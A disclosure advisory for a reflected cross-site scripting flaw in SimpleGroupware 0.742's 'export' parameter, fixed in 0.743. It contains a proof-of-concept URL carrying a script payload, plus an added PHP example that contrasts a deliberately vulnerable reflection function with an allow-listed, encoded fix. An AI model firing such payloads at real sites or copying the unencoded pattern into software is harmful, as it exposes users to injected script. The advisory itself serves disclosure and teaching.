SimpleGroupware 0.742 Cross Site Scripting

2012-02-07T00:00:00
ID PACKETSTORM:109516
Type packetstorm
Reporter Stefan Schurtz
Modified 2012-02-07T00:00:00

Description

Advisory: SimpleGroupware 0.742 Cross-Site-Scripting vulnerability  
Advisory ID: INFOSERVE-ADV2012-01  
Author: Stefan Schurtz  
Contact: security@infoserve.de  
Affected Software: Successfully tested on SimpleGroupware 0.742  
Vendor URL: http://www.simple-groupware.de/  
Vendor Status: fixed (see Changelog)  
  
==========================  
Vulnerability Description  
==========================  
  
SimpleGroupware 0.742 'export' parameter XSS vulnerability  
  
==================  
PoC-Exploit  
==================  
  
http://[target]/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert('xss')</ScRiPt>  
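
The following PHP is an added illustration of the vulnerability class behind this advisory; it is not SimpleGroupware's own code and not part of the original advisory. It shows the generic pattern of a query parameter reflected into HTML without encoding, next to a hardened version that allow-lists the value and encodes it for both the HTML and the URL context. The parameter name `export` comes from the advisory; the function names, the page markup and the list of accepted export formats are assumptions made for this example.

```php
<?php
// Added example, not SimpleGroupware's code. The "export" parameter name is taken
// from the advisory; everything else here (function names, markup, the accepted
// format list) is an assumption made for illustration.

// Vulnerable pattern: the raw query-string value is written straight into HTML.
function render_export_link_vulnerable(array $query): string
{
    $export = $query['export'] ?? '';
    // Whatever markup the value contains is emitted as markup, so a crafted
    // link executes script in the visiting user's browser (reflected XSS).
    return '<a href="index.php?export=' . $export . '">Export as ' . $export . '</a>';
}

// Hardened pattern: validate against an allow-list, then encode on output.
const ALLOWED_EXPORT_FORMATS = ['csv', 'xml', 'pdf']; // assumed formats

function render_export_link_safe(array $query): string
{
    $export = $query['export'] ?? '';

    // 1. Only accept values the application actually understands; anything
    //    else is rejected before it can reach the page.
    if (!in_array($export, ALLOWED_EXPORT_FORMATS, true)) {
        return '';
    }

    // 2. Encode for the HTML text context even though the value passed the
    //    allow-list (defence in depth if the list is later widened).
    $htmlSafe = htmlspecialchars($export, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    // 3. The same value lands in a URL, which is a different context and needs
    //    its own encoding.
    $urlSafe = rawurlencode($export);

    return '<a href="index.php?export=' . $urlSafe . '">Export as ' . $htmlSafe . '</a>';
}

// Constructed sample inputs: a benign format name and the advisory's payload.
$benign  = ['export' => 'csv'];
$hostile = ['export' => '<ScRiPt >alert(\'xss\')</ScRiPt>'];

// The vulnerable renderer passes the markup through untouched.
echo render_export_link_vulnerable($hostile), PHP_EOL;

// The hardened renderer rejects the hostile value and accepts the benign one.
echo render_export_link_safe($hostile), PHP_EOL;
echo render_export_link_safe($benign), PHP_EOL;
```

The allow-list is the primary control here: a format selector has a small, known set of valid values, so anything outside that set can be dropped rather than escaped. Output encoding is kept as the second layer because the value is used in two contexts (HTML text and a URL), and each context needs its own encoder.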
  
=========  
Solution  
=========  
  
Upgrade to the latest Version 0.743  
  
====================  
Disclosure Timeline  
====================  
  
01-Feb-2012 - informed vendor  
02-Feb-2012 - fixed by vendor  
  
========  
Credits  
========  
  
Vulnerability found and advisory written by the INFOSERVE security team.  
  
===========  
References  
===========  
  
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2012-01.txt  